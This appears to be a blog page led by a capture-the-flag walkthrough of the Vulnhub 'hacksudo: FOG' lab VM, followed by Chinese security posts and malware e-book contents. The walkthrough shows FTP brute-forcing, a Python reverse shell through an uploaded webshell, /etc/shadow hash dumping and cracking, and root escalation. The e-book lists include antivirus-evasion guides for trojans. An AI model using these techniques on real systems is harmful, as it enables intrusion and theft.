Vulnhub hacksudo: FOG Walkthrough

Vulnhub hacksudo: FOG Walkthrough

https://www.vulnhub.com/entry/hacksudo-fog,697/

Scan open ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 PORT      STATE SERVICE   VERSION                                               21/tcp    open  ftp       Pure-FTPd
 22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 111/tcp   open  rpcbind   2-4 (RPC #100000)
 443/tcp   open  ssl/https Apache/2.4.38 (Debian)
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 2049/tcp  open  nfs_acl   3 (RPC #100227)
 3306/tcp  open  mysql     MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
 ...
 43195/tcp open  mountd    1-3 (RPC #100005)
 45469/tcp open  nlockmgr  1-4 (RPC #100021)
 48871/tcp open  mountd    1-3 (RPC #100005)
 52195/tcp open  mountd    1-3 (RPC #100005)

Scan folders/files of port 80, download dict.txt.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 302) [Size: 0] [--> /fog/index.php]
 /index.html           (Status: 200) [Size: 853]
 /index1.html          (Status: 200) [Size: 329]
 /cms                  (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
 /dict.txt             (Status: 200) [Size: 1798]
 /fog                  (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]

Found username hacksudo at cms page.

[image-20210518224756405.png]

Bruteforce ftp.

 hydra -l hacksudo -P dict.txt  -t 32 192.168.56.100 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: hacksudo   password: hackme
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found

Download secr3tSteg.zip.

 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 43827
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 33         33                389 May  7 03:34 flag1.txt
 drwxr-xr-x    2 0          0                4096 May  6 13:57 hacksudo_ISRO_bak
 226-Options: -a -l
 226 4 matches total
 ftp> cd hacksudo_ISRO_bak
 250 OK. Current directory is /hacksudo_ISRO_bak
 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 46515
 drwxr-xr-x    2 0          0                4096 May  6 13:57 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 0          0                  63 May  5 11:07 authors.txt
 -rw-r--r--    1 0          0                   0 May  6 11:36 installfog
 -rw-r--r--    1 0          0             1573833 May  6 19:24 secr3tSteg.zip

Bruteforce password of zip.

 fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip    
 PASSWORD FOUND!!!!: pw == fooled

Download the SoundStegno provided at source code of index1.html.

[image-20210519103824772.png]

Decrypt the wav file unzipped from secr3tSteg.zip, get hints.

 python3 /opt/SoundStegno/ExWave.py  -f ./hacksudoSTEGNO.wav  
 ...
 Visit for more tutorials : www.youtube.com/techchipnet
 Hide your text message in wave audio file like MR.ROBOT
 Please wait...
 Your Secret Message is: Shift by 3
 ABCDEFGHIJKLMNOPQRSTUVWXYZ
 DEFGHIJKLMNOPQRSTUVWXYZABC
 zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

Decrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.

[image-20210518224455131.png]

Login cms with hacksudo:hacksudoISRO. Found cmsmsrce.txt.

[image-20210518224924381.png]

Check content of the txt file.

[image-20210519104218050.png]

Copy cmsmsrce.txt to shell.php, visit the following address in browser.

http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

At the same time, listen at port 1234 in another terminal, get reverse shell.

[image-20210519104609411.png]

Find suid files.

 find / -perm -u=s 2>/dev/null
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/sbin/mount.nfs
 /usr/bin/gpasswd
 /usr/bin/umount
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/look
 /usr/bin/mount
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/su
 /usr/bin/passwd

Use look to read /etc/shadow.

 www-data@hacksudo:/home$ look '' /etc/shadow
 look '' /etc/shadow
 root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
 ...
 isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
 dnsmasq:*:18756:0:99999:7:::

Crack password of isro.

  john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                fish-0 | 0 [23:32:44]
 Using default input encoding: UTF-8
 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 qwerty           (isro)

Log in ssh as user isro. Check sudo, but it's rabbit hole.

 ssh isro@192.168.56.100
 isro@192.168.56.100's password:
 Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
 isro@hacksudo:~$ sudo -l
 [sudo] password for isro:
 Matching Defaults entries for isro on hacksudo:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User isro may run the following commands on hacksudo:
     (root) /usr/bin/ls /home/isro/*
 isro@hacksudo:~$

In /home/isro/fog, found a executable file of user root.

 isro@hacksudo:~$ ls -la
 total 40
 drwxr-x--- 5 isro isro 4096 May 18 12:16 .
 drwxr-xr-x 6 root root 4096 May  8 12:25 ..
 -rw------- 1 root isro   41 May 18 11:44 .bash_history
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .bash_logout
 -rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
 drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
 drwx------ 3 isro isro 4096 May  5 14:09 .gnupg
 drwxr-xr-x 3 isro isro 4096 May  5 14:11 .local
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .profile
 -r-------- 1 isro isro   33 May  6 14:31 user.txt
 -rw------- 1 isro isro   54 May 18 12:16 .Xauthority
 isro@hacksudo:~$ cd fog
 isro@hacksudo:~/fog$ ls -la
 total 3700
 drwxr-xr-x 2 isro isro    4096 May 13 05:06 .
 drwxr-x--- 5 isro isro    4096 May 18 12:16 ..
 -rwxr-xr-x 1 root isro   16712 May 12 13:46 fog
 -rw-r--r-- 1 isro isro       0 May  6 14:30 get
 -rwxr-xr-x 1 isro isro   69368 May  6 14:29 ping
 -rwxr-xr-x 1 isro isro 3689352 May  6 14:30 python

Run fog, get python shell, check id, it's root.

 isro@hacksudo:~/fog$ ./fog
 Python 2.7.16 (default, Oct 10 2019, 22:02:15)
 [GCC 8.3.0] on linux2
 Type "help", "copyright", "credits" or "license" for more information.
 >>> import os;os.system("id");
 uid=0(root) gid=1003(isro) groups=1003(isro)
 0

Spawn a root shell.

 >>> import pty;pty.spawn("/bin/bash");
 ┌──(root💀hacksudo)-[~/fog]
 └─# id;hostname
 uid=0(root) gid=1003(isro) groups=1003(isro)
 hacksudo
 ┌──(root💀hacksudo)-[~/fog]
 └─# c
 bash: c: command not found
 ┌──(root💀hacksudo)-[~/fog]
 └─#
 ┌──(root💀hacksudo)-[~/fog]
 └─# 

部署使用WebGoat6网络漏洞测试平台

什么是WebGoat?引用一下OWASP官方介绍:

WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。WebGoat提供了一系列web安全学习的教程,某些课程也给出了视频演示,指导用户利用这些漏洞进行攻击。

WebGoat多年来一直是版本5.4,今年升级为版本6。主要是基于新的框架和界面对各项课程进行了重新集成,项目主页是 https://github.com/WebGoat/WebGoat

先来看一下两个版本的界面:

实际使用中,新版本不仅界面漂亮,关键是hints、solutions等选项的内容更加完善,便于学习。使用WebGoat有两种方法,一是直接下载运行包WebGoat-6.0-exec-war.jar,然后:

java -jar WebGoat-6.0-exec-war.jar

随后就可以在本机浏览器里使用了:http://localhost:8080/WebGoat

但是个人更倾向于另一种方法,就是下载源码包,通过maven部署使用。好处是可以完成一些需要修改源代码的课程,而且不限于本机运行。但全新安装tomcat、maven、java等必需环境,而且把参数设置好非常麻烦,所以直接在OWASP的Broken Web APP虚拟机上使用是最方便的,因为环境都已经构建好了。具体步骤如下:

下载得到WebGoat-Master.tar.gz,复制到/var/www里解压,得到WebGoat-master项目目录;
因为虚拟机启动时tomcat已经运行了,所以要先停止服务,再用mvn启动。将几个过程写成批处理:

    cat >~/run_webgoat6.sh<<EOF
    /etc/init.d/tomcat6 stop
    cd /var/www/WebGoat-master
    mvn clean tomcat:run-war
    EOF

这样,WebGoat5.4和6两个版本就是虚拟机里共存了。开机以后不运行run_webgoat6.sh脚本,则启动webgoat5.4,运行了以后再从主界面进入就可以play了!

给hostapd打补丁, 解决rt3070网卡建立软AP时无法握手的问题

折磨了自己一周多,供遇到同样问题的朋友们参考。

一般有两种方法在kali linux下建立软AP,一是使用airbase-ng,优点是运行方便,适应网卡的范围比较广,比如常见的rtl8187的网卡,局限是只能建立OPN和WEP加密的,不支持WPA和WPA2加密。二是通过hostapd,支持OPN、WEP、WPA、WPA2等多种加密方式,但支持的网卡有限。

之前我手上有rtl8187的网卡,一直把它当作神器,后来发现完全是被误导了,不仅信号一般,且支持的模式相当有限,最关键是不支持hostapd建立WPA加密的AP。用iw list命令可以看到rtl8187网卡支持的模式:

iw list
…
Supported interface modes:
     * IBSS
     * managed
     * monitor

一阵google后,在某电商那淘了一块rt3070芯片的,价格便宜、童叟无欺,支持b/g/n(rtl8187仅支持b/g),标配双6dBi增益天线,iw list看一下,瞬间发现这泥马才是真正的神器啊!(强烈推荐!!)

Supported interface modes:
     * IBSS
     * managed
     * AP
     * AP/VLAN
     * WDS
     * monitor
     * mesh point

继续阅读

一个简单的脚本,实现自动执行MITM攻击(更新0.2)

这几天折腾MITM攻击,反复输入同样的命令很烦人,参照国外论坛一个脚本,结合自己的习惯修改了一下,将几个常用命令写到一个文件里,实现相对自动的操作。

脚本很简单,简单说一下功能,内容就不多注释了。

1)设置监听网卡、端口、目标IP;

2)设置tcpxtract、driftnet、urlsnarf等辅助工具的启用;

3)自动运行sslstrip和ettercap,并输出数据到/tmp/(用户定义)目录中供后期分析;

4)监听结束后调用etterlog显示数据,并调用wireshark进行抓包分析;

5)简单的输入判定;

6)可以在命令行中输入一组或两组IP,重复运行时可通过bash log获取上次输入,不用每次运行都要重复输入IP。(更新)

代码如下:

继续阅读

折腾kali

这几天折腾kali的心得,记录一下

一、在三星note 8.0上安装kali

先安装linuxonandroid,然后下载kali镜像文件,放在外置存储卡上,目录随意,然后运行即可。主要问题是启动postgresql前,要将postgres用户添加到相关组里,命令如下:

usermod -a -G android_inetusermod -a -G android_inet

然后就可以service postgresql start了,不过貌似镜像文件要用ext2格式的,ext4的不行

三星note8.0的自带内核不支持内置网卡的mon模式,想玩aircrack之类的小伙伴们,只能等有高人改内核啦!

继续阅读

FCG PEDIY电子书

电子书作者:nbw

关于本书

本手册搜集了了FCG的DIY版块一年来的关于软件修改方面的精华文章。由于主要讲述DIY技术,因此论坛里面其他方面的文章暂且不搜集。别的论坛关于DIY的文章也很多,我也不一一搜集。如果发现问题或者有别的建议,欢迎来FCG与我们交流。

1年前的现在,FCG的DIY版块在laoqian以及众位FCG朋友的大力支持下成立了。软件DIY技术本来就不是高深技术,吸引不了多少人,加上本人资历、能力、努力都不够,一年来,随着FCG论坛的兴衰起落,DIY版块可谓惨淡经营。但好在有FCG支持和来这里的朋友们支持,因此还是取得了一定成果,发布了不少关于软件修改的文章,这里整理齐全,供高手娱玩,新手参考。

软件修改技术,行话叫PE DIY,以自行分析PE文件并按照自己的意愿进行改造为主。早期不
少高手对此进行了深入的研究,例如pll621大侠写的软件DIY教程。利用这种技术,可以修正软件bug,或者改造软件功能。如今,学习DIY技术可以提高自己的逆向破解功底,同时可以根据自己的要求改造软件。

从技术角度来说,要求懂得WIN32,系统编程,懂得调试,包括动态调试和静态调试;至少有一门高级语言编程能力,因为不少时候都是先把需要的功能在高级语言上实现再移植到软件中;懂得PE格式,因为我们修改的是PE文件;如果修改.net软件,则需要懂得.net方面相关技术和工具。

具体工作流程:1、明确工作目的,确定具体方案;2、寻找需要修改的地方;3、寻找合适的剩余空间以填写添加的代码;4、进行修改,填写自己的代码。

以上5点,是大体工作步骤,具体进行工作,需要注意每个细节。

如果软件经过了加壳,首先进行脱壳,我脱壳很垃圾,在此感谢hmimys长期以来的帮助。

寻找需要修改的地方,需要有一定的逆向工程功底,弄清楚需要修改的细节,对于不明白的细节,尽量保证不破坏原来软件的环境;

寻找剩余空间,可以找软件本身的多余空间,也可以添加新的节区,或者扩展最后一个节区,保证这些空间的内容可以被软件加载,如果需要,还要保证这些空间有可读/写属性;

添加自己的代码时,如果代码过多,不妨自己写一个DLL,然后加载进来;

以上等等,我也只能大体说一下注意事项,每次修改都有不同,需要各位自己去学习探索。

在此感谢看雪论坛的朋友们,感谢FCG各位朋友的支持!

目录

关于本DIY教程
XP记事本
打造QQ单开
打造myHiew
PE DIY SEH
Wicked DIY
AUTOcad2002
Delphi程序汉化
豪杰V8添加快捷键
修改一下空当接龙
2003记事本“最前”
扫雷游戏作弊逆向
VB初级逆向与利用
cyclotron的护肤宝
一份Reverseme解答
打造不被查杀的黑器
一个棋类游戏的修改
一个程序的开机补丁
net下程序的暴力修改
OD复制BUG分析和修正
浅谈API函数调用的方法
Sygate Office Network
蜘蛛纸牌分析与简单DIY
为程序添加对话框和网址
打造自己喜欢的 Ollydbg
豪杰3000最大化按钮无效
DEF分析与打造其脱壳软件
PhotoShop窗口置顶补丁制作
修改豪杰解霸V8播放显示信息
嵌入式木马---QQ另类木马全攻略
打造能处理 OutputDebugString(
DIY SnifferSnake 自动生成Keyfile
如何编写Loader(How to code a loader)
Trojan的完全修改——脱壳+特征码修改+PEDIY
掀开高级游戏黑客的面纱,教你打造游戏修改器

下载:DIYCHM

NE365电子书

关于本电子书:NE365 magazine V0.1

本电子书由NE365成员以及以上VIP朋友提供,绝大部分为原创。内容涉及病毒原理、病毒代码、病毒逆向分析、脱壳、破解,以及我们的一些作品。

本书主要目的是介绍病毒技术以及我们自己的作品。
需要注意的是本书不是教程,或许不能助初手迅速入门,因为此类技术的学习决非朝夕可就;或许也不能助大侠更上一层楼,因为我们自己也有待提高。

但是,我们给大家展示的是我们自己的心血以及我们的道路,因为这是我们坚持的也是为之奋斗的!
在此声明严禁利用本书内容进行非法活动,如若出现,我等概不负责
本书中绝对不含有病毒或者样本,只提供下载链接,书中的有些病毒代码或许被杀毒软件误报,请大家留意!

除注明外,版权归文章个人,如须转载请注明出处。

NE365 全体成员 2005-6-7
LOGO制作 : impossible苗
NE365 magazine V0.1
From NE365We are waiting here , just for u !

目录

病毒研究
关于本书
加密算法浅谈
一种在BIOS中嵌入应用程序的方法及实现
jtr(开膛手)
win32.bee
James PE virus V2.0
Ring3通用感染模块
尝试挂接file system
病毒的多进程
WormBenatic分析笔记
浅析在ring0下调用ring3层代码
关于dynaCHM
关于进入ring0的另一种方法
常用资料
BMP CrackME
逆向破解
A3至尊脱机版本ver0.97简要分析
EditPlus 数据结构
Editplus添加取消行注释功能
打造不被杀的topo工具
抛砖引玉——体验.Net下的程序破解
对winxp sp1下的扫雷的pediy,伪造鼠标消息,自动扫雷的实现
微软.NET通用语言运行库概观
一款工具的逆向分析与再实现
论坛文章节选
关于
.NET病毒Syra.dyna
29A8#浮点指令教程
FSD Direct IO File Operation Library Source
Kernel File IO Library Source
Map Physical Memory To User Space
MGF病毒的利用代码
pker's Decryptor Generation Engine
shadow3的后门代码
win32Lames分析
windowsXP的激活问题(没用激活器)
病毒分析技巧
感染闪存和移动硬盘
工具资料搜集
关于隐藏服务的讨论
简单的DIY:程序的自注册
取KiDebugRoutine的地址
谈谈特征码修改
一段花指令
一个compression engine
自己Swap自己,Ring0下做测试器时用的代码
蠕虫 srv32.exe 逆向分析笔记
蠕虫 srv32.exe 逆向分析笔记1 -- 启动篇
蠕虫 srv32.exe 逆向分析笔记2 -- 初始化篇
蠕虫 srv32.exe 逆向分析笔记3 -- 幕后通讯篇
蠕虫 srv32.exe 逆向分析笔记4
蠕虫 srv32.exe 逆向分析笔记5
Pker的病毒教学
Win32病毒入门 -- ring3篇 (1)
Win32病毒入门 -- ring3篇 (2)
Win32病毒入门 -- ring3篇 (3)
Win32病毒入门 -- ring3篇 (4)
Win32病毒入门 -- ring3篇 (5)
Win32病毒入门 -- ring3篇 (6)
Win32病毒入门 -- ring3篇 (7)
CCL专栏
CCL系列说明
打造不被查杀的黑器之超级攻略
打造免杀的winshell后门
打造免杀的灰鸽子
让黑器在内存中翱翔——浅谈内存特征码的定位与修改

下载:NE365v1